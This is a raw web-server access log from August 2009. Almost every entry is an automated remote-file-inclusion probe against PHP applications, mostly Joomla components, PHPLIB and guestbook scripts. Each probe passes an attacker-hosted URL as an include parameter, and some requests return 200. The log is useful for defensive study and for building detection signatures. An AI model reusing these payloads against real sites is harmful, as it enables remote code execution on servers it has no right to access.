65.223.204.131 - - [16/Aug/2009:06:47:57 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:48:18 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:48:18 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:48:18 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:06:48:44 -0500] "GET /logs/access_log.1242950400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:49:09 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:49:09 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.223.204.131 - - [16/Aug/2009:06:49:09 -0500] "GET /logs/access_log.1242432000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:49:53 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:49:53 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:49:54 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:06 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:06 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:14 -0500] "GET /logs/access_log.1244160000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:21 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:21 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:51:21 -0500] "GET /logs/access_log.1244160000/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:51:59 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:51:59 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:52:00 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:52:08 -0500] "GET /logs/access_log.1246665600/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:52:14 -0500] "GET //?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
124.158.127.241 - - [16/Aug/2009:06:52:21 -0500] "GET /logs/access_log.1246665600/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://aboutav.com//o/id1.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:52:41 -0500] "GET /logs/access_log.1242000000//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
193.34.16.183 - - [16/Aug/2009:06:52:47 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:54:11 -0500] "GET //include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:54:11 -0500] "GET /logs//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:54:11 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
83.222.30.58 - - [16/Aug/2009:06:54:25 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.207.118 - - [16/Aug/2009:06:55:16 -0500] "GET /logs/access_log.1193875200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.88.240.91 - - [16/Aug/2009:06:56:00 -0500] "GET //?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:06:56:01 -0500] "GET /logs/access_log.1241740800//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:06:56:03 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:56:10 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:56:12 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:56:12 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:06:57:40 -0500] "GET /logs/access_log.1244764800//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
218.38.136.251 - - [16/Aug/2009:06:57:40 -0500] "GET //?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
91.194.250.221 - - [16/Aug/2009:06:57:40 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.194.250.221 - - [16/Aug/2009:06:57:40 -0500] "GET //config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.194.250.221 - - [16/Aug/2009:06:57:40 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
218.38.136.251 - - [16/Aug/2009:06:57:41 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:59:04 -0500] "GET //guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:59:04 -0500] "GET /logs//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.234.2.107 - - [16/Aug/2009:06:59:04 -0500] "GET /logs/access_log.1244764800//guestbook1//admin.php?include_path=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
91.194.250.221 - - [16/Aug/2009:06:59:34 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
91.194.250.221 - - [16/Aug/2009:06:59:38 -0500] "GET //config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 305 "-""Microsoft Pocket Internet Explorer/0.6"
91.194.250.221 - - [16/Aug/2009:06:59:38 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 310 "-""Microsoft Pocket Internet Explorer/0.6"
91.194.250.221 - - [16/Aug/2009:06:59:38 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 332 "-""Microsoft Pocket Internet Explorer/0.6"
91.194.250.221 - - [16/Aug/2009:07:00:01 -0500] "GET /logs/access_log.1235692800//config/dbutil.bck.php?confdir=http://www.ywms.net/EL/claroline/auth/extauth/drivers/back.gif?? HTTP/1.1" 404 332 "-""Microsoft Pocket Internet Explorer/0.6"
124.158.127.241 - - [16/Aug/2009:07:00:39 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 296 "-""libwww-perl/5.79"
124.158.127.241 - - [16/Aug/2009:07:00:39 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.002mag.com/oneadmin/photogallery/CHID.txt????? HTTP/1.1" 404 291 "-""libwww-perl/5.79"
218.38.136.251 - - [16/Aug/2009:07:02:13 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:02:16 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:02:33 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:07:03:03 -0500] "GET //?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:07:03:07 -0500] "GET /logs/access_log.1244764800//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:07:03:08 -0500] "GET /logs//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 200 201281 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:03:27 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:03:32 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:03:32 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:05:04 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:05:04 -0500] "GET /logs/access_log.1242691200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
70.169.155.140 - - [16/Aug/2009:07:05:04 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
125.247.60.3 - - [16/Aug/2009:07:05:34 -0500] "GET /logs/access_log.1238544000//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:07:05:56 -0500] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 307 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:07:05:56 -0500] "GET /skin/ggambo7002_board/write.php?dir=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 302 "-""Mozilla/5.0"
216.97.43.58 - - [16/Aug/2009:07:05:56 -0500] "GET /logs/access_log.1247875200/skin/ggambo7002_board/write.php?dir=http://www.homesteadnazarene.org/id.gif? HTTP/1.0" 404 329 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:07:13 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:07:13 -0500] "GET /logs/access_log.1236038400/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:07:13 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
116.122.158.207 - - [16/Aug/2009:07:07:13 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:07:55 -0500] "GET /logs/index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt?????? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:07:55 -0500] "GET /index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt?????? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:08:51 -0500] "GET /logs/index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt?????? HTTP/1.1" 404 297 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:08:51 -0500] "GET /index.php?meio=http://www.diccor.es/clientes/modules/Forums/admin/license.txt?????? HTTP/1.1" 404 292 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
69.73.159.26 - - [16/Aug/2009:07:10:07 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:10:07 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:10:07 -0500] "GET /htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:10:09 -0500] "GET /htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:10:09 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
69.73.159.26 - - [16/Aug/2009:07:10:09 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:28 -0500] "GET /htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:28 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:28 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:43 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:43 -0500] "GET /logs/access_log.1244764800/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:43 -0500] "GET /htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:10:52 -0500] "GET /logs/access_log.1244764800//?_PHPLIB[libdir]=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:10:53 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:11:00 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
206.225.16.63 - - [16/Aug/2009:07:11:04 -0500] "GET /logs/access_log.1242259200//includes/login.php?_SESSION[docroot_path]=http://sakkas-driving.gr/gallery/g2data/baner.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:11:08 -0500] "GET /logs/access_log.1243036800/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.3.139.249 - - [16/Aug/2009:07:11:12 -0500] "GET /logs/access_log.1243728000/htmltonuke.php?filnavn=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:11:30 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:11:30 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:11:30 -0500] "GET /htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:11:37 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:37 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
208.97.167.21 - - [16/Aug/2009:07:11:39 -0500] "GET /htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:11:39 -0500] "GET /logs/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
208.97.167.21 - - [16/Aug/2009:07:11:39 -0500] "GET /logs/access_log.1239494400/htmltonuke.php?filnavn=http://www.pacepos.com/applications/web_cms/fx29id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
94.23.3.20 - - [16/Aug/2009:07:11:40 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:40 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:42 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:42 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:53 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:53 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:53 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:11:53 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.diccor.es/clientes/modules/Forums/admin/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:12:07 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
94.23.3.20 - - [16/Aug/2009:07:12:07 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fan-bo.org/biblioteca/modules/Forums/license/license.txt????? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
70.169.155.140 - - [16/Aug/2009:07:12:21 -0500] "GET /logs/access_log.1242777600/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 370 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:38 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:40 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:41 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:43 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
115.88.240.91 - - [16/Aug/2009:07:12:43 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://nimh.snmh.go.kr/bbs///data/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
